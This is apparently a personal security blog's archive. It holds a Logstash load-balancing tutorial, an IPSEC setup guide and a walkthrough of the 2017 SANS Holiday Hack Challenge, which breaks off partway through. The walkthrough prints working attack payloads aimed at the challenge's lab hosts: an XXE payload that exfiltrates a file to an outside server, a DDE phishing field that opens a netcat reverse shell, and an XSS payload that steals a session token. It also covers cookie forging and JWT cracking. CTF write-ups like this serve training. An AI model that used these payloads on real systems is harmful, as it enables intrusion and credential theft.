Sunday, November 4, 2018

Highly-Available and Load-Balanced Logstash

The Challenge

When using the Elastic Stack, I've found that Elasticsearch and Beats are great at load balancing, but Logstash... not so much, since it does not support clustering. The issue arises when you have end devices that cannot run a Beats agent (which could otherwise be pointed at two or more Logstash servers). To get around this, you would typically:

  • Set up any one of the Logstash servers as the syslog/event destination
    • Pro: Only one copy of the data to maintain
    • Con: What if that server or Logstash input goes down?
  • Set up multiple Logstash servers as the syslog/event destinations
    • Pro: More likely to receive the logs during a Logstash server or input outage
    • Con: Duplicate copies of the logs to deal with
A third option, which I've developed and laid out below, provides all of the pros and none of the cons of the options above: a highly-available and load-balanced Logstash implementation. This solution is highly scalable as well. Let's get started.

Prerequisites

For this proof-of-concept solution, I started with a very minimal configuration:
  • Two virtual machines within the same layer 2 domain (inside VMware Fusion)
    • CentOS 7 64-bit
    • Logstash 6.4.2
    • Java
    • Keepalived
    • IP Virtual Server (ipvsadm)
  • Host machine to generate some traffic (which will generate sample logs)
    • Mac OSX
    • nc

Log Server Configuration

OS Install


For this, I simply created a small VMware Fusion virtual machine using the CentOS 7 Minimal ISO as my installation source (this one in particular). The rest of the machine creation is pretty straightforward. (Note: I did change from NAT to Wi-Fi networking as I was having very strange issues with NAT networking)




After starting the virtual machine, the install process will begin. This is where you can just do a basic install, but I chose a few options that hit close to home with my day job:
  • Partition disk manually if intending to use a security policy (this would otherwise cause a security policy violation that will keep us from proceeding)

  • Configure static addressing (my Wi-Fi network within Fusion is 192.168.1.0/24 with a 192.168.1.1 gateway)
  • Apply the DISA STIG for CentOS Linux 7 because... security.
  • Don't forget to set the root password and create an administrative user. Without this, you'll have a hard time logging in (especially via SSH... given this security policy)


Application Install


From here, let the machine reboot and SSH in (it's a much better experience than using the console via Fusion, in my opinion). Some packages can now be added.
  • First, the Logstash and load-balancing prerequisite applications:
    • sudo yum -y install java tcpdump ipvsadm keepalived
  • Next, install Logstash per Elastic's best practices:
    • sudo rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch
    • sudo vi /etc/yum.repos.d/logstash.repo

      [logstash-6.x]
      name=Elastic repository for 6.x packages
      baseurl=https://artifacts.elastic.co/packages/6.x/yum
      gpgcheck=1
      gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
      enabled=1
      autorefresh=1
      type=rpm-md
    • sudo yum -y install logstash

    Logstash Configuration


    There's no way to show off all of the possible Logstash configurations (that's some research for you :) ), so I'll just set up a simple one for testing our highly-available Logstash cluster:
    • This is a bit different, but the API will need to be exposed outside the localhost:
      • sudo vi /etc/logstash/logstash.yml
        • Uncomment http.host and set it to the server's IP address
        • Uncomment http.port and set it to just 9600 (rather than the default 9600-9700 range)
    • The input and output configuration for Logstash is next (you can change the filename to something else... unless you agree). For this testing, I'm just setting up a raw UDP listener on port 5514 and writing to a file in /tmp.
      • sudo vi /etc/logstash/conf.d/ryanisawesome.conf
        input {
          udp {
            host => "192.168.1.210" # server's IP
            port => 5514
            id => "udp-5514"
          }
        }

        output {
          file {
            path => "/tmp/itworked.txt"
            codec => json_lines
          }
        }
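    For reference, after those edits the relevant logstash.yml lines on stash1 look like the following (each server uses its own address). You can also sanity-check the pipeline syntax before ever starting the service; the command below is just a sketch that assumes the default RPM install paths:
      http.host: "192.168.1.210"
      http.port: 9600
    • sudo /usr/share/logstash/bin/logstash --path.settings /etc/logstash --config.test_and_exit -f /etc/logstash/conf.d/ryanisawesome.conf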

    SELinux Tweaks


    There are a few settings that need to be changed to allow keepalived and ipvsadm to work properly.
    • Set the nis_enabled SELinux boolean to allow keepalived to call scripts which will access the network
      • sudo setsebool -P nis_enabled=1
    • Allow IP forwarding and binding to a nonlocal IP address
      • sudo vi /etc/sysctl.conf
        net.ipv4.ip_forward = 1
        net.ipv4.ip_nonlocal_bind = 1
        • If you chose the DISA STIG Policy during the VM build, comment out "net.ipv4.ip_forward = 0" (yes... this is a finding if this system is not a router. But once ipvsadm is running it IS a router. So we're all good ;) )
      • sudo sysctl -p

    Keepalived


    Here's where the real bread-and-butter of this setup lies: keepalived. This application is typically used to provide a virtual IP shared between two or more servers. If the primary server were to go down, the second (backup) would pick up the IP to avoid any substantial downtime. This is not a bad solution as far as high availability goes, but it means only one server will be processing our logs at any given time. We can do better.

    Another feature of keepalived is virtual servers. With this, you can configure a listening port on the virtual IP and, when data is received, keepalived (via IPVS) will forward it to a pool of real servers using a load-balancing method of your choosing. The configuration would look something like this:
    • sudo vi /etc/keepalived/keepalived.conf
      # Global Configuration
      global_defs {
        notification_email {
          notification@domain.org
        }
        notification_email_from keepalived@domain.org
        smtp_server localhost
        smtp_connect_timeout 30
        router_id LVS_MASTER
      }

      # describe virtual service ip
      vrrp_instance VI_1 {
        # initial state
        state MASTER
        interface ens33
        # arbitrary unique number 0..255
        # used to differentiate multiple instances of vrrpd
        virtual_router_id 1
        # for electing MASTER, highest priority wins.
        # to be MASTER, make 50 more than other machines.
        priority 100
        # unicast VRRP between the two Logstash servers (swap these values on the second node)
        unicast_src_ip 192.168.1.210
        unicast_peer {
          192.168.1.220
        }
        authentication {
          auth_type PASS
          auth_pass secret42
        }
        virtual_ipaddress {
          192.168.1.230/24
        }
      }

      # describe virtual Logstash server
      virtual_server 192.168.1.230 5514 {
        delay_loop 5
        lb_algo rr
        lb_kind NAT
        ops
        protocol UDP

        real_server 192.168.1.210 5514 {
          MISC_CHECK {
            misc_path "/bin/python /etc/keepalived/inputstatus.py 192.168.1.210 udp-5514"
          }
        }
        real_server 192.168.1.220 5514 {
          MISC_CHECK {
            misc_path "/bin/python /etc/keepalived/inputstatus.py 192.168.1.220 udp-5514"
          }
        }
      }

    Logstash Health Checks


    You'll probably notice a reference to inputstatus.py in the above configuration. Keepalived needs to run an external script to determine whether or not the configured "real server" is eligible to receive the data. This is typically pretty easy to do with TCP... if a SYN, SYN/ACK, ACK is successful, we can assume the service is listening. That is not an option with a Logstash UDP input, as nothing is sent back to confirm that the service is listening. What can be used instead is the API. The following script simply makes an API call to list the node's stats, parses the resulting list of inputs, and exits normally if the input we're looking for is up.


    • sudo vi /etc/keepalived/inputstatus.py
      #!/bin/python
      # Check the Logstash node stats API and exit 0 only if the requested input ID is running
      import sys
      import urllib2
      import json

      if len(sys.argv) != 3:
          print "Usage: inputstatus.py IP input-id"
          exit(1)

      # Pull the node stats and grab the list of inputs running on the main pipeline
      res = urllib2.urlopen('http://' + sys.argv[1] + ':9600/_node/stats').read()
      inputs = json.loads(res)['pipelines']['main']['plugins']['inputs']

      match = False

      # Look for the input ID we were asked about (e.g., udp-5514)
      for input in inputs:
          if sys.argv[2] == input['id']:
              match = True

      # 0 = healthy (stay in the pool), 1 = remove from the pool
      if match == True:
          exit(0)
      else:
          exit(1)
    Keepalived will add this server to the list of real servers if the exit code of our script is 0 and remove it from the list if it is anything except 0. The aforementioned keepalived configuration is set up to check this script every 5 seconds for minimal log loss if one goes down. Adjust as you see fit here (i.e., how much loss can you acceptably handle).

    Of course, you would have to create several of these if you have Logstash listening on multiple ports, but cut and paste is easy. Just look at /var/log/messages to ensure that these scripts are exiting properly. If you see a line like "Oct 30 09:44:58 stash1 Keepalived_healthcheckers[16141]: pid 16925 exited with status 1", either the script failed or a particular input is not up. Since this error message isn't the most descriptive, you'll have to manually test or view each input on each host to see which one it is. You can manually test the Logstash inputs (once that service is running) by issuing:

    • /bin/python /etc/keepalived/inputstatus.py <IP> <input-id>
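    Since keepalived only acts on the exit code, it helps to echo it when testing by hand. For example:
    • /bin/python /etc/keepalived/inputstatus.py 192.168.1.210 udp-5514; echo $?
      • An exit code of 0 means the input is up (the real server stays in the pool); anything else means it will be pulled out.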

    Firewall Rules


    Sure, we could just disable firewalld... but we did just expose our API to anything that can reach this machine, so we need to lock this down a bit better. Don't worry, the rules are pretty straightforward. (Note: replace '192.168.1.111' with the host that is sending logs to Logstash, and '192.168.1.210', '192.168.1.220', and '192.168.1.230' with the two Logstash servers and the virtual IP address, in that order).
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.210/32 protocol value=vrrp accept' 
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.220/32 protocol value=vrrp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.210/32 destination address=192.168.1.220/32 port port=9600 protocol=tcp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.220/32 destination address=192.168.1.210/32 port port=9600 protocol=tcp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.111/32 destination address=192.168.1.230/32 port port=5514 protocol=udp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.111/32 destination address=192.168.1.210/32 port port=5514 protocol=udp accept'
    • sudo firewall-cmd --permanent --add-rich-rule='rule family=ipv4 source address=192.168.1.111/32 destination address=192.168.1.220/32 port port=5514 protocol=udp accept'
    • sudo firewall-cmd --reload
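    After the reload, you can double-check what actually took effect; the output should echo back the rich rules above:
    • sudo firewall-cmd --list-rich-rules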

    The Second Logstash Server


    Shut down the Logstash server virtual machine since it's much easier to just clone this one and make a few configuration changes instead of stepping through this process all over again.

    Now that it's shut down...


    Boot the second one up (leaving the first powered off for now) and make the following changes in the VM console:
    • Set hostname
      • sudo hostnamectl set-hostname stash2
    • Set IP address
      • sudo vi /etc/sysconfig/network-scripts/ifcfg-<interface>
        • Change IPADDR to appropriate IP address
      • sudo systemctl restart network
    • Change Logstash listening IPs
      • sudo vi /etc/logstash/logstash.yml
        • Change http.host to stash2's IP address
      • sudo vi /etc/logstash/conf.d/ryanisawesome.conf
        • Change host to stash2's IP address
    • Swap the unicast_src_ip and unicast_peer IP addresses
      • sudo vi /etc/keepalived/keepalived.conf
    • Reboot
      • sudo reboot now
    Now, you should be able to start the original virtual machine (in my case, stash1).

    Putting It All Together


    We've finally reached the point to fire up all the services and test out the HA Logstash configuration. On each Logstash VM:

    • sudo systemctl enable logstash
    • sudo systemctl start logstash
    • sudo systemctl enable keepalived
    • sudo systemctl start keepalived
    You can monitor that Logstash is up by viewing the output of:
    • sudo ss -nltp | grep 9600
    If you have no output, it's not up yet. If it doesn't come up after a few minutes, check /var/log/logstash/logstash-plain.log for any error messages. Personally, I like to "tail -f" this file right after starting Logstash to ensure everything is working properly (plus it looks cool to those that look over your shoulder as all that nerdy text flies by).

    On each machine, you can now check that ipvsadm and keepalived are configured properly and playing nice together. You should be able to run the following commands and get similar output (your IPs may be different, but you should see TWO real servers):
    • ip a
      • Only ONE of the two servers should have the virtual IP assigned (by default, the one with the higher IP address since the priority is the same and this is the tie-breaker when using VRRP)
    • sudo ipvsadm -ln
      IP Virtual Server version 1.2.1 (size=4096)
      Prot LocalAddress:Port Scheduler Flags
        -> RemoteAddress:Port           Forward Weight ActiveConn InActConn
      UDP  192.168.1.230:5514 rr ops
        -> 192.168.1.210:5514           Masq    1      0          0       
        -> 192.168.1.220:5514           Masq    1      0          0 
    To test that load balancing is happening, the sample log source (in my case, my host operating system) will need to send some data over UDP 5514 to the virtual IP address. To do this, I'm going to use netcat (but really anything that can send data manually over UDP will work... including PowerShell). 
    • for i in $(seq 1 4); do echo "testing..." | nc -u -w 1 192.168.1.230 5514; done
    What I just did was send four test messages to the virtual IP. If everything worked properly, the virtual server will have received the messages and load-balanced them, in round-robin fashion, across the two real servers, each writing to its own /tmp/itworked.txt file. Let's check it out on each server.
    • cat /tmp/itworked.txt
      {"host":"192.168.1.111","@timestamp":"2018-11-04T17:34:37.065Z","message":"testing...\n","@version":"1"}
      {"host":"192.168.1.111","@timestamp":"2018-11-04T17:34:39.038Z","message":"testing...\n","@version":"1"}
    Success! Both servers received two messages!

    Thursday, August 9, 2018

    Ryan's CTF Has Come to an End...

    Thanks everyone!

    My Google Cloud Platform trial is very low on funds, so it's time to end the CTF. I hope everyone had a great time. Here are the results:

    372 teams!


    Only 17% got the NINJA challenge... All but 8 were solved AFTER John Hammond's video walkthrough.

    3142 flag submissions!

    First 10 with a perfect score of 1000!

    True CTF NINJAs with perfect scores!




    To all that played and provided feedback, THANK YOU! There will be more of this to come!


    Monday, July 16, 2018

    Free CTF is Online!

    While my free Google Cloud Platform account is still active (until ~30 Nov 2018), feel free to try out my Capture the Flag at http://ctf.ryanic.com! Have fun red teamers! Ground rules: please try not to hack the platform itself. That ruins the fun for others.

    Monday, April 2, 2018

    Resolving REST over HTTP Man-in-the-Middle with IPSEC

    So... what's the problem?

    I was recently working on some Elastic Stack clustering when I quickly realized that, if two or more nodes traverse a security boundary, they may be subject to tampering if an evil man (or woman) in the middle were to intercept and modify the data sent between them. Yes, there is a solution from Elastic, called X-Pack Security, that can provide SSL between the nodes, but that's one of the rare things that Elastic charges for. The reason I was even pondering the use of Elastic was to replace a certain, well-known data aggregation solution that is eating up quite a bit of budget (and even more memory).

    Below is the traffic between two nodes (10.1.2.230 and 10.1.2.231). This data, sent over TCP port 9300, is used for Elasticsearch cluster communication and is simply REST over HTTP. What could possibly go wrong? This communication could include things such as node-to-node conversations, replication of data, or other important cluster information. If this data were to be captured, attackers could get some valuable intelligence regarding the systems supported by this log aggregation service. Worse yet, if this communication were to be poisoned via a man-in-the-middle attack, the entire log aggregation service could be deemed useless.



    What was the solution?

    After a ton of Googling, I stumbled upon a solution that has been very well known in the Red Hat community for some time now that, honestly, I should have been aware of - LibreSwan. LibreSwan is a free, open-source package that allows for host-to-host, host-to-network, and network-to-network IPSEC tunneling. This would be perfect! After some trial and error, I decided to use the Pre-Shared Key implementation to test it out. Here's the very simple setup and configuration of LibreSwan:

    1) Install Libreswan on each node:

    # yum -y install libreswan

    2) Configure a tunnel (in this case, it is named mytunnel and the config file is located at /etc/ipsec.d/my_host-to-host.conf):

    # vi /etc/ipsec.d/my_host-to-host.conf

    conn mytunnel
            left=10.1.2.230
            right=10.1.2.231
            authby=secret
            auto=start

    3) Create a random, base64-encoded key from 48 random bytes (you only need to do this on one machine, as the keys MUST match on both sides; running the command twice will produce different keys):

    # openssl rand -base64 48
    n8+ef4PA4VAtqd1iX7QzC3sLmxlLi30LzOTgg7JBmNXQ7Wsi8SnweO+hjlXNK/rE

    4) Create a "secrets" file with the above command output as the pre-shared key (Note: this is one, continuous line):

    # vi /etc/ipsec.d/es.secrets
    10.1.2.230 10.1.2.231 : PSK "n8+ef4PA4VAtqd1iX7QzC3sLmxlLi30LzOTgg7JBmNXQ7Wsi8SnweO+hjlXNK/rE"

    5) Enable and start the Libreswan service:

    # systemctl enable ipsec
    # systemctl start ipsec
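
    Optionally, verify that the tunnel actually established before moving on (a quick check; the exact output varies by Libreswan version):

    # ipsec status | grep mytunnel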

    As you can see below, the Wireshark output is now showing ESP communication between the two endpoints! As long as that pre-shared key is kept secret, we're good (although it may be a good idea to rotate this key occasionally so offline brute force attacks would be less successful).



    What's next?

    I should probably move away from the pre-shared key implementation and on to getting this working with public/private keys so I don't need to worry about secure transmission of the pre-shared key in production. Other than that, this solution seems pretty solid, as I've been sending quite a bit of data at my Elastic Stack implementation and it's replicating across the cluster rather seamlessly!

    Thursday, January 11, 2018

    2017 SANS Holiday Hack Challenge Walkthrough

    Introduction

    This article actually started life as my notes for the 2017 SANS Holiday Hack Challenge, and I thought it would make a great blog post over at ryanic.com for anyone who may be struggling with any of the challenges. With that said, there are SPOILERS EVERYWHERE, so proceed with caution if you just want nudges here and there, as this article shows, in great detail with screenshots'o'plenty, how to complete each and every challenge (to include the terminal challenges). With that, let's get started!

    The Setup

    Throughout the course of this challenge, I realized that a simple web browser on a laptop may not be enough, since many of the challenges all but require reverse shells and some exploit code. The biggest hint came when I viewed some of the SANS Pentest blogs and, in particular, this one describing the benefits of Amazon EC2 instances for penetration tests.

    With that, I ended up with the following:
    • Host machine (Mid-2015 Macbook Pro -- arguably Apple's best laptop to date)
    • VMware Fusion with the following virtual machines:
      • Kali Rolling 2017.1 Linux
      • Windows 10
        • Microsoft Office 2016
        • Netcat (directory added to %PATH%)
    • Google Cloud Platform Compute Engine (bitnami-launchpad-lampstack)
      • One year, free $300 credit
      • Added an inbound firewall rule to allow 4444/TCP (80/TCP and 443/TCP are enabled by default when deploying a web VM)

    The Nine Challenges

    1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

    This challenge actually took a bit as only having the snowball tool did not make getting the page an easy task. It wasn't until I had the conveyor by beating a terminal challenge (see those in all their glory after the nine challenges section) that I was able to retrieve the page. I'm not going to show what I placed where as you, the reader, should experience all the pain that I did when trying to guide the giant snowballs to their ultimate destinations. I will, however, show off by posting screenshots of the objectives that I met:

    To answer the question, the title of this first page is About This Book...

    2) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?

    This was a multi-step process involving lots of research and understanding of a relatively new vulnerability that affected most of us in the United States -- Apache Struts. The first place I went (and most people go) when pen-testing a web application is "View Source". It looked pretty vanilla until one link seemed a little out of place...
    Following that link led me to a development version of the web site. Upon viewing the source of the dev page, I found a nice hint as to what to do next:
    This information, along with the hints received from Sparkle Redberry (great elf names, by the way) led me to this exploit: https://www.exploit-db.com/exploits/42627/. If vulnerable, the only thing left to find is a proper URL. Through some trial-and-error and creating some entries on the dev site, I found one: http://dev.northpolechristmastown.com/orders/1234 (could really be any number here).

    To allow for a remote shell to return to me, I fired up a Google Cloud VM, set up a firewall rule to allow port 4444/tcp, and tried to receive a shell from the web server:

    Now that I'm in, it's time to find that Great Book Page. The web root directory in many Linux installations is /var/www/html, so that's the first place I'll check:
    There it is, so I'll use the same exploit that sent me the shell to send me the file (this time to my own web directory so I can retrieve it easily) NOTE: Google changed my IP from what it was before and this happens several times throughout:

    The topic of the page is Flying Animals.

    Now, it's time to find Alabaster's password. I'll solve this by simply doing a recursive search for "alabaster" to see which files may list his username and password in plain text:
    After looking into that file, I found Alabaster's password, stream_unhappy_buy_loss:

    3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?

    This will be the first time I use the public-facing Letters to Santa (l2s) server to pivot internally. There are many ways to pull this off, but the easiest is to simply establish local port forwarding from my Kali machine's port 445, through the l2s server via SSH, and then to the ultimate destination's port 445. First, though, I need to find the Server Message Block (SMB) server. To do this, I SSH to alabaster's machine using the password found in the last challenge (thereby verifying that it is correct). Once connected, I find out quickly that commands are limited (it's an rbash session), but nmap is available:
    Using one of Holly Evergreen's hints, I discover that not all of North Pole Christmas Town's machines respond to pings, so nmap may falsely report that they are down. To combat this, I'm going to use the following command to discover which machines are serving SMB:
    So, I have two choices... the EMI host and the one named smb-server. I think it's safe to assume that the one to go after is hhc17-smb-server (10.142.0.7). I'm going to set up local port forwarding and see which shares are available (it was also noted by Holly that Alabaster likes to reuse credentials, so I'll try to connect to the SMB server as him):
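    The commands looked roughly like this (a reconstruction rather than a screenshot; binding local port 445 requires root, and 10.142.0.7 is the SMB server found above):
      sudo ssh -L 445:10.142.0.7:445 alabaster_snowball@l2s.northpolechristmastown.com
      smbclient -L //localhost -U alabaster_snowball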
    The "FileStor" share looks interesting, so let's check that one out:
    Bingo! There's the third page! I'll grab all of the other files as well as they may be useful later:
    Now we possess the third page (The Great Schism) but, to answer the question, the share name is FileStor:


    4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?

    For access to the internal systems with web frontends (EWA, EAAS, EDB), I have to, yet again, use the l2s server as a pivot -- this time as a Socket Secure (SOCKS) proxy listening on local port 8000:
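    The SSH command for that is roughly the following (a sketch; -D opens a dynamic SOCKS listener on local port 8000):
      ssh -D 8000 -N alabaster_snowball@l2s.northpolechristmastown.com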
    I'm also adding BURP Suite into the mix to intercept any connections that I may want to modify by having it listen on port 8080 and then send the data to the SOCKS proxy:

    And, finally, I'm setting up Firefox to send HTTP to BURP:
     
    Now, I can finally browse to the mail server... as soon as I figure out its IP. Luckily, l2s has a hosts file that tells me everything I need (otherwise, I'd resort to nmap to find a host with open mail ports):
    After browsing to http://10.142.0.5, I see a login page. I remember Pepper Minstix telling me about potential dev files and that Alabaster "was working on keeping the dev files from search engine indexers". To me, this means there's probably a robots.txt file that may point me to directories or files that the web admin wants to keep from being crawled:
    And there it is: cookie.txt. Let's see what this tells us:
    To get a sense of the code, I will install node, npm, and the aes-256 and randomstring modules on Kali and walk through the code. Eventually, I start playing with ciphertexts of varying lengths and differing keys to see if I could get anything strange to happen (as there are hints pointing towards encrypted text of 16 bytes causing something strange) and in fact I do notice something odd:
    It appears that no matter which key is used, when I pass a string of 22 characters as the ciphertext, it returns a blank string as the plaintext. This makes sense given the warning about 16 bytes and the reference to base64 in the code. Knowing that every 6 bits of input become an 8-bit character of output when converting to base64, I'm going to do a little math. Sixteen bytes equals 128 bits, which expands to roughly 170.7 bits of base64 output (this would actually be padded out to 176 bits to stay a multiple of 8 bits so it can be presented properly; this padding is where you would see = or == at the end of a base64 string), which, finally, equals 22 characters. I can definitely use this to my advantage, as we'll see shortly.

    I'll return to the login page and review the source. Here's where I notice a few more things:
    • There's a custom.js page to investigate
    • On the custom.js page, it looks like the login request is forwarded to account.html for verification:
    Next, I'm going to use BURP to see what's being sent when visiting the page:
    Nice! Looks like a JSON-style cookie with fields we can manipulate using the things we learned earlier: the blank plaintext, the 22-character ciphertext, and... a name. What would a valid name be? Time to brute force the login page to see if we get any login errors (or lack thereof). After trying alabaster_snowball (like the SSH login) I get an error message of "User Does Not Exist. Ex - first.last@northpolechristmastown.com". Well, that was easy. I'll just put alabaster.snowball@northpolechristmastown.com as the name. This is where an awesome Firefox add-on comes in, Cookie Manager+:
    The cookie is now forged and I can now attempt to access http://10.142.0.5/account.html:
    And... I'm in! Now to sift through the Inbox for the Great Book page:
    The email with the subject "Lost book page" tells us to look at /attachments/GreatBookPage4_893jt91md2.pdf:
    This page tells us that there is an ongoing war between Munchkins and Elves!

    5) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

    The wording to this challenge was a bit tricky as I was considering how many "coals" it took to be recognized as "naughty" instead of, literally, how many times the person showed up in the NPPD database. After that was clear, this was as simple as merging a couple Excel files and creating a pivot table.

    As shown in the third challenge, I obtained the Naughty and Nice list in both Word and Excel formats from the SMB server. To be able to carve through the data more easily, I'm choosing to use the Excel version. The next step is to get a copy of the infractions. This isn't readily apparent, as the NPPD infractions page doesn't show a download link unless you first filter the data. To get all the data, it does support selecting a field name (status in my example) equal to a wildcard to "filter" the data and show the Download link, as shown below with status:*.
    ...

    The downloaded file contained raw JSON, so I found this neat site to convert this data to Comma-Separated Values (CSV). I simply uploaded my JSON file and it spit out a .csv file.

    After opening this file, I immediately copy/paste the naughty-nice.csv data into a second sheet called "Naughty and Nice List". Now, I'm going back to the original sheet, creating an additional column called naughty-nice, and using the VLOOKUP function to record whether the person in the infractions_name column is considered naughty or nice:
    This formula will now be pasted down the 998 other rows (this will make sense shortly...). Next, I am creating a Pivot Table to "unique" each name, show how many occurrences there are of the name (infractions), and a filter to show those who are considered naughty or nice:
    When sorting the data that was output by "Count of infractions_name" and toggling between naughty and nice, it appears that any name occurring 4 or more times is considered naughty (shown sorted lowest to highest in the screenshot below) and any name occurring 3 or fewer times is considered nice (shown sorted highest to lowest in the screenshot below):



    So with that... 4 is the number of infractions required to be considered naughty by Santa.

    In regards to the insider threat moles, another hint came from one of the files from the SMB server (BOLO - Munchkin Mole Report.docx):

    This one is rather easy as I am just going to look for any people with occurrences of  "Throwing Rocks (at people)" and/or "Aggravated pulling of hair" infractions. With this, I find that the following are Munchkin Moles (there are plenty more):
    So... six more moles to name are Beverly Khalil, Kirsty Evans, Nina Fitzgerald, Manuel Graham, Sheri Lewis, and Adrian Kemp.

    Finally, after getting to the exits of all of the games, I receive the following "Conversation with Bumble and Sam" in my Stocking:

    So, as you can see, the Abominable Snow Monster was the one throwing the snowballs!

    6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

    As shown in the earlier screenshot of /etc/hosts, the EaaS server is located at http://10.142.0.13. Upon browsing to that server, there are two interesting links -- "click here" under Elf Checking System 2.0 and "here!" under Elf Reset. First, I'll try "click here" which takes me to http://10.142.0.13/Home/DisplayXML:

    Here, I'm presented with a couple of hints on how to proceed: 
    • I have an ability to upload a file
    • The file it wants may be an XML (given the URI). 
    This leads me to have a look at this SANS Pentest blog. XML External Entity (XXE) manipulation seems like a viable option, so I'll create these two files:
    • The XML file to upload (test.xml)
      • This tells the server grab more code from the test.dtd file that my web server (35.192.43.130 this time) is hosting
      • After retrieving instructions, do whatever sendit says to do (from the .dtd file)
    • The DTD file to live on my web server (test.dtd)
      • Set the stolendata variable to C:\greatbook.txt
      • Send a GET request to my web server on port 4444
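    Roughly, the two files look like this (a sketch of the classic out-of-band XXE pattern rather than my exact payload; 35.192.43.130 is my web server from above, and the wrapper entity name is arbitrary):
      test.xml (uploaded to the EaaS server):
        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE demo [
          <!ENTITY % remote SYSTEM "http://35.192.43.130/test.dtd">
          %remote;
          %sendit;
        ]>
        <demo>placeholder</demo>
      test.dtd (hosted on my web server):
        <!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">
        <!ENTITY % wrapper "<!ENTITY &#x25; sendit SYSTEM 'http://35.192.43.130:4444/?%stolendata;'>">
        %wrapper;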
    Before I can upload the file, I'm starting a netcat listener on my web server. Now to upload the file and wait to see if I get the contents of greatbook.txt:
    Hey! A link! Let's go there:
    The title of this page is The Dreaded Inter-Dimensional Tornadoes.

    7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?

    I have to use a Windows machine with Office to exploit this one, as there are plenty of hints stating that Alabaster likes to check his email from the EMI machine... which also has Office installed. I attempted pulling off this exploit with Office for Mac, but it just wouldn't work. Anyway, now that I have access to the email server, I can send Alabaster phishing emails. The sky's the limit with phishing, but there is a great hint from Shinny Upatree regarding Dynamic Data Exchange (DDE), so that's what I'll try, using this article as a guide. The reason I believe this will work is this email stating that Alabaster doesn't have the greatest security practices when it comes to email (or many other things, as we've already seen):
    My code looked a bit different than what was in the link and, to be honest, I attempted several payloads. I tried to have Alabaster pull down powercat.ps1 and execute it (the download portion would work, but the execute portion always seemed to fail). I settled on running netcat, since this email hints that it may be installed (and that its directory is in his %PATH%):
    Here's the final code embedded in a docx which simply launches a netcat connection to l2s:
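    It was a DDEAUTO field along these lines (a sketch; substitute the l2s server's internal IP and listening port for the placeholders):
      DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc <l2s-ip> <port> -e cmd.exe"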

    I will log in as Shinny Upatree using the same cookie modification as earlier when I logged in as Alabaster to send my phishing email to Alabaster (he may not click on an email from himself). Here's my message (with the .docx attached):
    Just before hitting send, I will start an ncat listener on l2s and will wait for the connection. After a short time, I received the reverse shell and proceeded to send the GreatBookPage7.pdf file to my Google VM, and then to Kali (ignore the typo... this attack was inconsistent and I couldn't get a "clean" screenshot, thus showing that I am, in fact, human):



    This Great Book page describes witches as neutral... that is, until we unseated the villain (who is the one provoking the war -- as you'll see later).

    8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

    Probably the most complex and "out of my comfort zone" challenge of this whole event! I used Wunorse Openslae's hints pretty heavily and, more importantly, learned a TON in the process.

    I, again, will utilize the SOCKS proxy connection to the l2s/dev server to reach this internal asset. After setting up the connection, the first step is to navigate to 10.142.0.6 and  find a way to use the Cross-Site Scripting (XSS) vulnerability that is hinted at. At first glance, the root of http://10.142.0.6/index.html is a simple login page, but there's also a "Support" link, which leads to a form... a great place to try some XSS:

    Before conducting XSS, I first have to decide what I want to get out of it (instead of doing XSS for XSS's sake). Looking at the source code of index.html, it appears that the JSON Web Token (JWT) (that, again, is hinted at by Wunorse) is being stored as LocalStorage with the name "np-auth":
    After a lot of trial and error using the link provided by Wunorse for some XSS evasion, I finally settle on this to send the JWT to my Google Cloud VM (<IMG SRC=/ is preceding "onerror"...):
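    The payload was along these lines (a reconstruction; the idea is to make the victim's browser request a URL from my server with the token appended so it lands in the access log):
      <IMG SRC=/ onerror="var i=new Image(); i.src='http://35.192.43.130/'+localStorage.getItem('np-auth');">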

    After a few minutes, the JWT shows up in my Apache access_log:
    I will now parse the two base64-encoded portions of the JWT (the first part before the first period and the second part between the first and second periods) and get the following information about the login session:
    As you can see, this JWT is expired, so a new date must be inserted. This sounds easy, but then the signature (the part after the second period) would be invalid. This also means that I need to crack the key. This is where jwtcrack comes in handy.

    After downloading jwtcrack, I have to install the tool (on my MacBook since I prefer to use all of the machine's horsepower for cracking things instead of what's limited to a VM):
    Next I am going to run it with the entire JWT as an argument, sit back, and wait for this program to brute-force the secret key:
    How original... the secret key is 3lv3s. Now I must create a JWT with a proper date that I can use. I'll use Wunorse's advice and create a JWT (with a proper date and the same data as the original) with pyjwt (not shown, I installed with sudo pip install pyjwt):
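    The forging step looks roughly like this in a Python shell (a sketch; the claims are copied from the decoded token with the expiration pushed out, and pyjwt signs with the cracked 3lv3s key):
      import jwt
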